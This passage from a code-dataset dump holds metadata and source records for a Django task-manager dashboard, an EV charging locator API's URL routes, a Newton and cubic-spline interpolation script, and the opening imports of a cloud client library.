"usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", 
"line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 606, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 606, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 607, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 607, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 608, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 626, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 626, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 675, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 675, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 691, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 691, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 709, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 709, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 717, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 732, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 740, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 741, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 741, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 742, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 743, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 774, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 920, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 942, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 990, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1000, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1001, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1002, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1003, "usage_type": "call"}, {"api_name": "lightgbm.reset_parameter", "line_number": 1010, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1015, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 1016, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1030, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1045, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1046, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1055, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1060, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1061, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1061, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 1063, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1063, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1064, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1064, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1065, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1065, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1066, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1066, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1073, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1075, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1104, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1107, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1116, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1118, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1119, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 1139, "usage_type": "call"}, {"api_name": "sklearn.ensemble.VotingClassifier", "line_number": 1160, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 1166, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 1193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 1198, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.Parallel", "line_number": 1204, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.delayed", "line_number": 1205, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 1205, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1217, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1233, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1239, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1250, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1253, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1262, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1264, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1265, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1285, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": 
"time.time", "line_number": 1301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1319, "usage_type": "name"}]} +{"seq_id": "19575685423", "text": "from django.shortcuts import render\nfrom task_manager.tasks.models import Task\nfrom task_manager.projects.models import Project\n\n\ndef dashboard_view(request):\n # Общие данные\n total_tasks = Task.objects.count()\n total_open_tasks = Task.objects.exclude(status__name=\"завершена\").count()\n\n # Данные по проектам\n projects_data = []\n for project in Project.objects.all():\n project_tasks = Task.objects.filter(project=project)\n project_open_tasks = project_tasks.exclude(status__name=\"завершена\")\n projects_data.append({\n 'project_name': project.name,\n 'total_tasks': project_tasks.count(),\n 'open_tasks': project_open_tasks.count(),\n })\n\n context = {\n 'total_tasks': total_tasks,\n 'total_open_tasks': total_open_tasks,\n 'projects': projects_data,\n }\n\n return render(request, 'task_manager/dashboard.html', context)\n", "repo_name": "NikGor/TaskManager", "sub_path": "task_manager/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "task_manager.tasks.models.Task.objects.count", "line_number": 8, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 8, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.exclude", "line_number": 9, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 9, "usage_type": "name"}, {"api_name": "task_manager.projects.models.Project.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "task_manager.projects.models.Project.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "task_manager.projects.models.Project", "line_number": 13, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "14829944383", "text": "from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\nfrom .views import UserRegisterView, UserLoginView, UserProfileView, UserView, BookingViewSet, 
PaymentViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"EV Charging Locator API\",\n default_version='v1',\n description=\"EV Charging Locator API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\nurlpatterns = [\n path('swagger', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('register/', UserRegisterView.as_view(), name='user-register'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view(), name='user-profile'),\n path('user/', UserView.as_view(), name='user'),\n path('bookings/', BookingViewSet.as_view({'post': 'create', 'get': 'list'}), name='bookings-list'),\n path('bookings//', BookingViewSet.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name='bookings-detail'),\n path('payment/', PaymentViewSet.as_view({'post': 'create'}), name='payment-create'),\n]\n \n \n", "repo_name": "nbanda2023/evproject", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "drf_yasg.views.get_schema_view", "line_number": 12, "usage_type": "call"}, {"api_name": "drf_yasg.openapi.Info", "line_number": 13, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 13, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.Contact", "line_number": 18, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 18, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.License", "line_number": 19, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": 
"views.BookingViewSet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "2252701539", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\n\r\n# data from file 8\r\nx_points = np.array([ -1.2000000e+001,\r\n -1.0000000e+001,\r\n -8.0000000e+000,\r\n -6.0000000e+000,\r\n -4.0000000e+000,\r\n -2.0000000e+000,\r\n 0.0000000e+000,\r\n 2.0000000e+000,\r\n 4.0000000e+000,\r\n 6.0000000e+000,\r\n 8.0000000e+000])\r\n\r\ny_points = np.array([ -4.7169811e-002,\r\n -2.8571429e-002,\r\n -2.3809524e-002,\r\n -4.5454545e-002,\r\n-1.0000000e-001,\r\n -1.6666667e-001,\r\n-1.0000000e-001,\r\n -4.5454545e-002,\r\n -2.3809524e-002,\r\n-1.4285714e-002,\r\n -9.4339623e-003])\r\n\r\n\r\ndef divided_diff(x, y):\r\n n = len(y)\r\n coef = np.zeros([n, n])\r\n\r\n coef[:, 0] = y\r\n\r\n for j in range(1, n):\r\n for i in range(n - j):\r\n coef[i][j] = \\\r\n (coef[i + 1][j - 1] - coef[i][j - 1]) / (x[i + j] - x[i])\r\n\r\n return coef\r\n\r\ndef newton_poly(coef, x_data, x):\r\n n = len(x_data) - 1\r\n p = coef[n]\r\n for k in range(1,n+1):\r\n p = coef[n-k] + (x -x_data[n-k])*p\r\n return p\r\n\r\n\r\na_s = divided_diff(x_points, y_points)[0, :]\r\n\r\nx_new = np.arange(-12, 8.1, .1)\r\ny_new = newton_poly(a_s, x_points, x_new)\r\n\r\ndef cubic_interp1d(x0, x, y):\r\n\r\n x = np.asfarray(x)\r\n y = np.asfarray(y)\r\n\r\n if np.any(np.diff(x) < 0):\r\n indexes = np.argsort(x)\r\n x = x[indexes]\r\n y = y[indexes]\r\n\r\n size = len(x)\r\n\r\n xdiff = np.diff(x)\r\n ydiff = np.diff(y)\r\n\r\n Li = np.empty(size)\r\n Li_1 = np.empty(size-1)\r\n z = np.empty(size)\r\n\r\n Li[0] = sqrt(2*xdiff[0])\r\n Li_1[0] = 0.0\r\n B0 = 0.0\r\n z[0] = B0 / Li[0]\r\n\r\n for i in range(1, size-1, 1):\r\n Li_1[i] = xdiff[i-1] / Li[i-1]\r\n Li[i] = sqrt(2*(xdiff[i-1]+xdiff[i]) - Li_1[i-1] * Li_1[i-1])\r\n Bi = 6*(ydiff[i]/xdiff[i] - ydiff[i-1]/xdiff[i-1])\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n i = size - 1\r\n Li_1[i-1] = xdiff[-1] / Li[i-1]\r\n Li[i] = sqrt(2*xdiff[-1] - Li_1[i-1] * Li_1[i-1])\r\n Bi = 0.0\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n\r\n i = size-1\r\n z[i] = z[i] / Li[i]\r\n for i in range(size-2, -1, -1):\r\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\r\n\r\n index = x.searchsorted(x0)\r\n np.clip(index, 1, size-1, index)\r\n\r\n xi1, xi0 = x[index], x[index-1]\r\n yi1, yi0 = y[index], y[index-1]\r\n zi1, zi0 = z[index], z[index-1]\r\n hi1 = xi1 - xi0\r\n\r\n f0 = zi0/(6*hi1)*(xi1-x0)**3 + \\\r\n zi1/(6*hi1)*(x0-xi0)**3 + \\\r\n (yi1/hi1 - zi1*hi1/6)*(x0-xi0) + \\\r\n (yi0/hi1 - zi0*hi1/6)*(xi1-x0)\r\n return f0\r\n\r\nplt.figure(figsize = (12, 8))\r\nplt.scatter(x_points, y_points)\r\nplt.plot(x_points, y_points, 'bo')\r\nplt.plot(x_new, y_new)\r\nX_new = np.linspace(-12, 2.1, 201)\r\nplt.plot(x_new, cubic_interp1d(x_new, x_points, y_points))\r\nplt.show()\r\n", "repo_name": "kopczyn12/numerical-methods", "sub_path": "interpolation_methods/mn8.py", "file_name": "mn8.py", "file_ext": "py", "file_size_in_byte": 2779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 
"dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 74, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "43238082118", "text": "import logging\nimport json\n\nfrom yunionclient.common import http\n\nfrom yunionclient.api import zones\nfrom yunionclient.api import keypairs\nfrom yunionclient.api import hosts\nfrom yunionclient.api import wires\nfrom yunionclient.api import hostwires\nfrom yunionclient.api import storages\nfrom yunionclient.api import hoststorages\n\nfrom yunionclient.api import networks\nfrom yunionclient.api import disks\nfrom yunionclient.api import guests\nfrom yunionclient.api import guestdisks\nfrom yunionclient.api import guestnetworks\nfrom yunionclient.api import groupnetworks\n\nfrom yunionclient.api import groupguests\n\nfrom yunionclient.api import flavors\n\nfrom yunionclient.api import usages\n\nfrom yunionclient.api import logs\n\nfrom yunionclient.api import images\n\nfrom yunionclient.api import vncproxy\n\nfrom yunionclient.api import sshrelay\n\nfrom yunionclient.api import quotas\n\nfrom yunionclient.api import secgroups\n\nfrom yunionclient.api import 